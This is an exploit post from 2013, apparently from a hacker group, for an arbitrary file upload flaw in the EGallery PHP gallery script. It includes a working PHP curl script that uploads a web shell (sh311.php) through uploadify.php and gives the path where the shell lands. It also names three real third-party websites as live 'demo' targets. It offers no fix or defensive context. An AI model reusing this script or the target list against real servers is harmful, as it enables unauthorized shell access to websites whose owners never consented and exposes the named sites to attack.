facebook facebook twitter rss

EGALLERY (all versions) Arbitrary File Upload Vulnerability

Author: TUNISIAN CYBER , Published: 27-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: EGALLERY (all versions) Arbitrary File Upload Vulnerability
[+] Date: 26-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/e-gallery/?source=directory
[+] Google Dork: USE YOUR MIND
[+] Tested on: Win7
[+] Friend's blog: http://na3il.com

########################################################################################
+Description:

EGallery is a PHP script that generates an image gallery from a directory of files
without having to set up a database.
What this means to you is that you can have an image gallery set up in mere seconds by just uploading the EGallery files to your web server

Exploit:
EGALLERY suffers from from Arbitrary File Upload Vulnerability:
PHP extension is allowed which allows the attacker to upload a malicious PHP Script

Exploit In PHP:
<?php  
$uploadfile
="sh311.php";  
$ch curl_init("SITE.LTD/[PATH]/egallery/uploadify.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";
?>


Shell Path:
Site.ltd/sh311.php (in the root file)

Demo:
http://www.settimanebibliche.it/gallery/2013giobbe/egallery/uploadify.php
http://ericheikkinen.com/demo/egallery/egallery/uploadify.php
http://www.fly737ng.de/HRPT/egallery/uploadify.php
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Like us on Facebook :